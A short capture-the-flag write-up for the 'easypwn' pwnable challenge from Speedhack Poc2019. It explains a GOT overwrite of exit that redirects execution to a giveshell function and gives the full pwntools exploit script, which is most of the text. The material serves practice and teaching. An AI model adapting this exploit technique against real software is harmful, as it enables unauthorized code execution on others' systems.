Speedhack Poc2019 Pwnable Writeup

LeeDoHyun · June 1, 2020

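At first the binary hands out the address of system, so I grabbed it and started from there, but in the end it turned out not to be needed…

In the delete function, exit(0); is called whenever idx goes above 9, so overwriting the GOT entry for exit is all it takes.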

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *

#context.log_level = 'debug'
r = process('./easypwn')
e = ELF('./easypwn')

'''
r.recvuntil('0x')
system = int(r.recv(12), 16)

log.success('system addr : {}'.format(hex(system)))
'''

giveshell = e.symbols['giveshell']

def malloc(size, idx, data):
    r.sendlineafter('>', str(1))
    r.sendlineafter(':', str(size))
    r.sendlineafter(':', str(idx))
    r.sendlineafter(':', str(data))

def free(idx):
    r.sendlineafter('>', str(2))
    r.sendlineafter(':', str(idx))

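# Write giveshell's address to 0x601050 (the GOT entry for exit)
malloc(-1, 0x601050, giveshell)
# idx > 9 makes delete call exit(0), which now resolves to giveshell
free(10)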
r.interactive()
